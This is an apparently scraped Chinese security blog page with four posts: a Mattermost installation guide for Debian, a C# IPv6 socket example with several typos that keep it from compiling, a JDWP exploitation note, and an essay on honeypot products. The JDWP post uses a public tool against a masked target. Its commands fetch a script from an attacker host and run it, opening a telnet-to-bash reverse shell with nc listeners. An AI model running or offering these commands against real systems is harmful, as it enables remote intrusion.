Debian Jessie搭建Mattermost

作者:Secer 发布时间:July 21, 2016 分类:精品软件 No Comments

Websocket聊天,不支持xmpp

 

Install Debian Jessie (x64)


1. Set up 3 machines with Debian Jessie with 2GB of RAM or more. The servers will be used for the Load Balancer, Mattermost (this must be x64 to use pre-built binaries), and Database.
2. This can also be set up all on a single server for small teams:• I have a Mattermost instance running on a single Debian Jessie server with 1GB of ram and 30 GB SSD
• This has been working in production for ~20 users without issue.
• The only difference in the below instructions for this method is to do everything on the same server
• Make sure the system is up to date with the most recent security patches.• sudo apt-get update
• sudo apt-get upgrade

Set up Database Server


1. For the purposes of this guide we will assume this server has an IP address of 10.10.10.1
2. Install PostgreSQL 9.3+ (or MySQL 5.6+)• sudo apt-get install postgresql postgresql-contrib
• PostgreSQL created a user account called postgres. You will need to log into that account with:• sudo -i -u postgres
• You can get a PostgreSQL prompt by typing:• psql
• Create the Mattermost database by typing:• postgres=# CREATE DATABASE mattermost;
• Create the Mattermost user by typing:• postgres=# CREATE USER mmuser WITH PASSWORD 'mmuser_password';
• Grant the user access to the Mattermost database by typing:• postgres=# GRANT ALL PRIVILEGES ON DATABASE mattermost to mmuser;
• You can exit out of PostgreSQL by typing:• postgre=# \q
• You can exit the postgres account by typing:• exit
• Allow Postgres to listen on all assigned IP Addresses• sudo vi /etc/postgresql/9.3/main/postgresql.conf
• Uncomment ‘listen_addresses’ and change ‘localhost’ to ‘*’
• Alter pg_hba.conf to allow the mattermost server to talk to the postgres database• sudo vi /etc/postgresql/9.3/main/pg_hba.conf
• Add the following line to the ‘IPv4 local connections’
• host all all 10.10.10.2/32 md5
• Reload Postgres database• sudo /etc/init.d/postgresql reload
• Attempt to connect with the new created user to verify everything looks good• psql --host=10.10.10.1 --dbname=mattermost --username=mmuser --password
• mattermost=> \q

Set up Mattermost Server


1. For the purposes of this guide we will assume this server has an IP address of 10.10.10.1
2. Download the latest Mattermost Server by typing:
• wget https://github.com/mattermost/platform/releases/download/vX.X.X/mattermost.tar.gz
• Where vX.X.X is the latest Mattermost release version. For example, v2.0.0
• Install Mattermost under /opt
• Unzip the Mattermost Server by typing:
• tar -xvzf mattermost.tar.gz
• sudo mv mattermost /opt
• Create the storage directory for files. We assume you will have attached a large drive for storage of images and files. For this setup we will assume the directory is located at /opt/mattermost/data.
• Create the directory by typing:
• sudo mkdir -p /opt/mattermost/data
• Create a system user and group called mattermost that will run this service
• sudo useradd -r mattermost -U
• Set the mattermost account as the directory owner by typing:
• sudo chown -R mattermost:mattermost /opt/mattermost
• sudo chmod -R g+w /opt/mattermost
• Add yourself to the mattermost group to ensure you can edit these files:
• sudo usermod -aG mattermost USERNAME
• Configure Mattermost Server by editing the config.json file at /opt/mattermost/config
• cd /opt/mattermost/config
• Edit the file by typing:
• vi config.json
• replace DriverName": "mysql" with DriverName": "postgres"
• replace "DataSource": "mmuser:[email protected](dockerhost:3306)/mattermost_test?charset=utf8mb4,utf8"with "DataSource": "postgres://mmuser:[email protected]:5432/mattermost?sslmode=disable&connect_timeout=10"• Assuming a default IP address of 10.10.10.1
• Optionally you may continue to edit configuration settings in config.json or use the System Console described in a later section to finish the configuration.
• Test the Mattermost Server
• cd /opt/mattermost/bin
• Run the Mattermost Server by typing:
• ./platform
• You should see a console log like Server is listening on :8065 letting you know the service is running.
• Stop the server for now by typing ctrl-c
• Setup Mattermost to use the systemd init daemon which handles supervision of the Mattermost process
• sudo touch /etc/init.d/mattermost
• sudo vi /etc/init.d/mattermost
• Copy the following lines into /etc/init.d/mattermost


#! /bin/sh
### BEGIN INIT INFO
# Provides: mattermost
# Required-Start: $network $syslog
# Required-Stop: $network $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Mattermost Group Chat
# Description: Mattermost: An open-source Slack
### END INIT INFO
PATH=/sbin:/usr/sbin:/bin:/usr/bin
DESC="Mattermost"
NAME=mattermost
MATTERMOST_ROOT=/opt/mattermost
MATTERMOST_GROUP=mattermost
MATTERMOST_USER=mattermost
DAEMON="$MATTERMOST_ROOT/bin/platform"
PIDFILE=/var/run/$NAME.pid
SCRIPTNAME=/etc/init.d/$NAME
. /lib/lsb/init-functions
do_start() {
# Return
# 0 if daemon has been started
# 1 if daemon was already running
# 2 if daemon could not be started
start-stop-daemon --start --quiet \
--chuid $MATTERMOST_USER:$MATTERMOST_GROUP --chdir $MATTERMOST_ROOT --background \
--pidfile $PIDFILE --exec $DAEMON --test > /dev/null \
|| return 1
start-stop-daemon --start --quiet \
--chuid $MATTERMOST_USER:$MATTERMOST_GROUP --chdir $MATTERMOST_ROOT --background \
--make-pidfile --pidfile $PIDFILE --exec $DAEMON \
|| return 2
}
#
# Function that stops the daemon/service
#
do_stop() {
# Return
# 0 if daemon has been stopped
# 1 if daemon was already stopped
# 2 if daemon could not be stopped
# other if a failure occurred
start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 \
--pidfile $PIDFILE --exec $DAEMON
RETVAL="$?"
[ "$RETVAL" = 2 ] && return 2
# Wait for children to finish too if this is a daemon that forks
# and if the daemon is only ever run from this initscript.
# If the above conditions are not satisfied then add some other code
# that waits for the process to drop all resources that could be
# needed by services started subsequently. A last resort is to
# sleep for some time.
start-stop-daemon --stop --quiet --oknodo --retry=0/30/KILL/5 \
--exec $DAEMON
[ "$?" = 2 ] && return 2
# Many daemons don't delete their pidfiles when they exit.
rm -f $PIDFILE
return "$RETVAL"
}
case "$1" in
start)
[ "$VERBOSE" != no ] && log_daemon_msg "Starting $DESC" "$NAME"
do_start
case "$?" in
0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;;
2) [ "$VERBOSE" != no ] && log_end_msg 1 ;;
esac
;;
stop)
[ "$VERBOSE" != no ] && log_daemon_msg "Stopping $DESC" "$NAME"
do_stop
case "$?" in
0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;;
2) [ "$VERBOSE" != no ] && log_end_msg 1 ;;
esac
;;
status)
status_of_proc "$DAEMON" "$NAME" && exit 0 || exit $?
;;
restart|force-reload)
#
# If the "reload" option is implemented then remove the
# 'force-reload' alias
#
log_daemon_msg "Restarting $DESC" "$NAME"
do_stop
case "$?" in
0|1)
do_start
case "$?" in
0) log_end_msg 0 ;;
1) log_end_msg 1 ;; # Old process is still running
*) log_end_msg 1 ;; # Failed to start
esac
;;
*)
# Failed to stop
log_end_msg 1
;;
esac
;;
*)
echo "Usage: $SCRIPTNAME {start|stop|status|restart|force-reload}" >&2
exit 3
;;
esac
exit 0


• Make sure that /etc/init.d/mattermost is executable
• sudo chmod +x /etc/init.d/mattermost
• On reboot, systemd will generate a unit file from the headers in this init script and install it in/run/systemd/generator.late/
Note: This setup can also be done using a systemd unit, usable for non-Debian systems, such as Arch Linux. The unit file is as follows:
# cat /etc/systemd/system/mattermost.service


[Unit]
Description=Mattermost
After=network.target
[Service]
User=mattermost
ExecStart=/home/mattermost/mattermost/bin/platform
WorkingDirectory=/home/mattermost/mattermost
Restart=always
RestartSec=30
[Install]
WantedBy=multi-user.target

# systemctl start mattermost
# systemctl enable mattermost

Set up Nginx Server


1. For the purposes of this guide we will assume this server has an IP address of 10.10.10.3
2. We use Nginx for proxying request to the Mattermost Server. The main benefits are:
• SSL termination
• http to https redirect
• Port mapping :80 to :8065
• Standard request logs
• Install Nginx on Debian with
• sudo apt-get install nginx
• Verify Nginx is running
• curl http://10.10.10.3
• You should see a Welcome to nginx! page
• You can manage Nginx with the following commands
• sudo service nginx stop
• sudo service nginx start
• sudo service nginx restart
• Map a FQDN (fully qualified domain name) like mattermost.example.com to point to the Nginx server.
• Configure Nginx to proxy connections from the internet to the Mattermost Server
• Create a configuration for Mattermost
• sudo touch /etc/nginx/sites-available/mattermost
• Below is a sample configuration with the minimum settings required to configure Mattermost


server {
server_name mattermost.example.com;
location / {
client_max_body_size 50M;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Frame-Options SAMEORIGIN;
proxy_pass http://10.10.10.2:8065;
}
}


• Remove the existing file with
• sudo rm /etc/nginx/sites-enabled/default
• Link the mattermost config by typing:
• sudo ln -s /etc/nginx/sites-available/mattermost /etc/nginx/sites-enabled/mattermost
• Restart Nginx by typing:
• sudo service nginx restart
• Verify you can see Mattermost thru the proxy by typing:
• curl http://localhost
• You should see a page titles Mattermost - Signup

Set up Nginx with SSL (Recommended)


1. You can use a free and an open certificate security like let’s encrypt, this is how to proceed
• sudo apt-get install git
• git clone https://github.com/letsencrypt/letsencrypt
• cd letsencrypt
• Be sure that the port 80 is not use by stopping nginx
• sudo service nginx stop
• netstat -na | grep ':80.*LISTEN'
• ./letsencrypt-auto certonly --standalone
• This command will download packages and run the instance, after that you will have to give your domain name
• You can find your certificate in /etc/letsencrypt/live
• Modify the file at /etc/nginx/sites-available/mattermost and add the following lines:


server {
listen 80;
server_name mattermost.example.com;
return 301 https://$server_name$request_uri;
}
server {
listen 443 ssl;
server_name mattermost.example.com;
ssl on;
ssl_certificate /etc/letsencrypt/live/yourdomainname/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/yourdomainname/privkey.pem;
ssl_session_timeout 5m;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';
ssl_prefer_server_ciphers on;
ssl_session_cache shared:SSL:10m;
location / {
gzip off;
proxy_set_header X-Forwarded-Ssl on;
client_max_body_size 50M;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Frame-Options SAMEORIGIN;
proxy_pass http://10.10.10.2:8065;
}
}


• Be sure to restart nginx
• sudo service nginx start
• Add the following line to cron so the cert will renew every month
• crontab -e
• @monthly /home/YOURUSERNAME/letsencrypt/letsencrypt-auto certonly --reinstall -d yourdomainname&& sudo service nginx reload

Finish Mattermost Server setup


1. Navigate to https://mattermost.example.com and create a team and user.
2. The first user in the system is automatically granted the system_admin role, which gives you access to the System Console.
3. From the town-square channel click the dropdown and choose the System Console option
4. Update Email Settings. We recommend using an email sending service. The example below assumes AmazonSES.• Set Send Email Notifications to true
• Set Require Email Verification to true
• Set Feedback Name to No-Reply
• Set Feedback Email to [email protected]
• Set SMTP Username to AFIADTOVDKDLGERR
• Set SMTP Password to DFKJoiweklsjdflkjOIGHLSDFJewiskdjf
• Set SMTP Server to email-smtp.us-east-1.amazonaws.com
• Set SMTP Port to 465
• Set Connection Security to TLS
• Save the Settings
• Update File Settings• Change Local Directory Location from ./data/ to /mattermost/data
• Update Log Settings.• Set Log to The Console to false
• Update Rate Limit Settings.• Set Vary By Remote Address to false
• Set Vary By HTTP Header to X-Real-IP
• Feel free to modify other settings.
• Restart the Mattermost Service by typing:• sudo restart mattermost

http://docs.mattermost.com/install/prod-debian.html

C# IPv6的Socket编程

作者:Secer 发布时间:July 21, 2016 分类:代码学习 No Comments

服务端监听代码:

IPAddress dirIP = IPAddress.Parse("fe00:e130:91d4:913b:126c");
IPEndPoint endPoint = new IPEndPoint(dirIP, 55577); 

Socket serverSocket = new Socket(AddressFamily.InterNetworkV6,
                                SocketType.Stream,
                                ProtocolType.Tcp);
try
{
    serverSocket.Bind(endPoint);
    serverSocket.Listen(int.MaxValue);
    StreamReader reader = null;
    StreamWriter writer = null;
    while(true)
    {
        Socket clientSocket = serverSocket.Accpet();
        NetworkStream ntStream = new NetworkStream(clientSocket);
        reader = new StreamReader(ntStream);
        string dataClient = reader.ReadLine();
        Console.WriteLine("Client::"+dataClient);
        if(dataClient == "Quit")
            break;
        writer = new StreamWriter(ntStream);
        string dataServer = "Hello  Clinet,I'm Server!";
        writer.WriteLine(dataServer);
        writer.Flush();
        Console.WriteLine("Server::" + dataServer);
    }
    reader.Close();
    writer.Close();
}
catch(Exception ex)
{
    Console.WriteLine(ex.Message + ex.ToString());
} 

客户端连接代码

IPAddress direction = ("fe00:e130:91d4:913b:126c");
IPEndPoint endPointSrv = new IPEndPoint(direction,55577);
Socket clientSocket = new Socket(AddressFamily.InterNetworkV6,
                                SocketType.Stream,
                                ProtocolType.Tcp);
try
{
    clientSocket.Connect(endPointSrv);
    StreamReader reader = null;
    StreamWriter writer = null;
    NetworkStream ntStream = new NetworkStream(clientSocket);
    writer = new StreamWriter(ntStream);
    string dataClient = "Hello,I'm Client! ";
    writer.WriteLine(dataClient);
    writer.Flush();
    Console.WriteLine("Client 已连接");
    reader = new StreamWriter(ntStream);
    string dataServer = reader.ReadLine();
    Console.WriteLine("Server::" + dataServer);
}
catch(Exception ex)
{
    Console.WriteLine(ex.ToString());
}
reader.Close();
writer.Close(); 

JDWP系统命令漏洞执行利用实例

作者:Secer 发布时间:July 21, 2016 分类:Web安全 No Comments

好久没更新博客,一切都因为太忙

偶遇几个JDWP,测试下 漏洞存在所以写个笔记记下

NMAP扫描

image

利用工具: https://github.com/IOActive/jdwp-shellifier

 

image

要触发**.**.**.**.ServerSocket.accept 访问一下web端口就行了

 

此目标的Web端口是8009哦

 

姿势来自

http://www.wooyun.org/bugs/wooyun-2010-095744

增加利用telnet反弹得到shell的方法,以国内某设备为例

./jdwp-exp.py -t **.**.**.** -p 8000 --cmd 'wget http://x.x.x.x:2222/shell.txt -O /tmp/shell.sh'

./jdwp-exp.py -t **.**.**.** -p 8000 --cmd 'chmod a+x /tmp/shell.sh'

./jdwp-exp.py -t **.**.**.** -p 8000 --cmd '/tmp/shell.sh'

shell.txt内容:(需要开2个端口,一个用于发送命令一个用于接受命令返回)

telnet x.x.x.x 1111 | /bin/bash | telnet x.x.x.x 3333

 

然后在x.x.x.x服务器上用nc监听1111端口和3333端口

1111端口是发送命令,3333回显命令结果的

两个cmd窗口

image

 

nc -nnv -L -p 3333

nc -nnv -L -p 1111

为什么这么多创业公司都在做“蜜罐”?也许这篇文章能告诉你

作者:Secer 发布时间:July 21, 2016 分类:黑客技巧 No Comments

前言

信息安全发展到了今天繁荣的程度,传统的安全还是靠静态的特征码的方式来识别攻击,但是伴随着新型的APT攻击的出现,很多企业才意识到传统安全技术手段已经无法满足对内部威胁的及时发现,于是,很多传统的安全公司大佬都开始转战使用动态沙箱技术来解决问题,有卖设备型的例如Symantec ATP硬件配合终端的SEP构成、有360安全卫士联动威胁情报的方式,来探测未知威胁,当然这种方式主要是针对APT攻击的第一个环节,你黑客通过社会工程学的手段得到用户的信息,使用网络钓鱼或者水坑攻击的方式进入企业内网个人PC。但是要拿到有价值的内部敏感信息,黑客需要进一步部署攻击链,包括获取凭证、内网资产扫描等探测工作,因为很多行业包括金融机构是不允许在业务服务器上安装安全解决方案的,甚至配置日志系统都不可以,那么,目前部署蜜罐是最好的解决方案了。

那么研究蜜罐解决方案,我们目前更关注的有以下几个方面:

开源蜜罐和商业蜜罐区别?

到底蜜罐是否需要大数据分析(机器学习算法)?

蜜罐创业商业模式如何?

现有产品分析

本节介绍包括开源蜜罐分析和国内外商业蜜罐分析。

开源蜜罐按照类型可以划分为以下几种:

数据库蜜罐(典型案例:ElasticSearch Honeypot

ElasticSearch Honeypot:看了一下源码,发现是使用go语言实现的几个fake函数

Fake banner:访问根目录时候,返回函数

FakeNodes:访问/Nodes目录时候,返回函数

FakeSearch:访问/Search目录时候,返回函数

hpfeedsConnect:使用hpfeed协议通讯

发现都是伪造的函数返回,这样很有可能被入侵者发现是蜜罐,所以建议使用原始软件版本加patch的方式完成蜜罐记录功能,当然研发投入也比较大。个人建议模拟以下Elastic search漏洞:

ESA ID

CVE Link

Vulnerability Summary

ESA-2015-08

CVE-2015-5531

Elasticsearch versions from 1.0.0 to 1.6.0 are vulnerable to a directory traversal attack.

ESA-2015-06

CVE-2015-5377

Elasticsearch versions prior to 1.6.1 are vulnerable to an attack that can result in remote code execution.

ESA-2015-05

CVE-2015-4165

All Elasticsearch versions from 1.0.0 to 1.5.2 are vulnerable to an attack that uses Elasticsearch to modify files read and executed by certain other applications.

ESA-2015-02

CVE-2015-3337

All Elasticsearch versions prior to 1.5.2 and 1.4.5 are vulnerable to a directory traversal attack that allows an attacker to retrieve files from the server running Elasticsearch when one or more site plugins are installed, or when Windows is the server OS.

拿漏洞ESA-2015-08目录列举漏洞举例子,创建仓库,elasticsearch 解析出现了异常,并返回了读取文件的内容,以后都是读取的/etc/passwd 文件的内容。那么这个蜜罐怎么做呢?应该把文件变更记录做好,然后使用原始版本以patch的方式记录登录、RESTful API提交记录,这个使用真实服务模拟的研发投入也比较大。

Web蜜罐(典型案例:Glastopf)

漏洞类型仿真

未知的攻击

支持多种数据库类型

HPFeeds通讯

过内置的沙箱PHP远程文件包含,本地文件包含通过POST请求

通常对手使用搜索引擎和特殊制作的搜索请求找到他们的受害者

模拟SQL注入、爬虫响应等。

如果要是我做,还是要结合WAF精细化攻击数据。因为正常和不正常的URL访问太多。

服务蜜罐(典型案例Kippo)

伪装文件系统

• 伪装用户文件存储

•    Sftp子文件系统 上传文件存储

• 模拟一些特殊的黑客关心的文件/etc/passwd

伪造系统命令

• 文件上传下载命令 sftp、scp,同时支持客户端wget/curl命令解析

•    SSH交互执行的命令(黑客入侵常用命令):w\exit\cat\uname\chmod\ps\cd

伪装系统相关配置

•    Hostname

•    SSH服务指纹

•    SSH账号和密码

•    SSH key

与外部威胁情报联动

• 连接IP白名单威胁情报

• 上传可疑文件内容检查威胁情报

日志大数据处理

• 支持elastic search日志导出

SSH蜜罐目前开源解决方案比较成熟,但是还是缺乏BASH内部命令审计和文件变更审计。。。。

工控蜜罐

这个不在我们讨论的范围,工控有致命的弱点,通讯协议本身没有加密,Wireshark完全透视,我觉得,还是把工控防火墙做好,然后再想蜜罐的事吧。

其它蜜罐(典型案例:RDPY)

RDPY:RDPY是基于Twisted Python实现的微软RDP远程桌面协议。RDPY支持标准的RDP安全协议,通过SSL或者NLA加密验证(或者通过nltmv2验证协议)其子项目rdpy-rdphoneypot是一个基于RDP的蜜罐。使用会话场景记录并通过RDP协议来重放会话场景。

阅读剩余部分...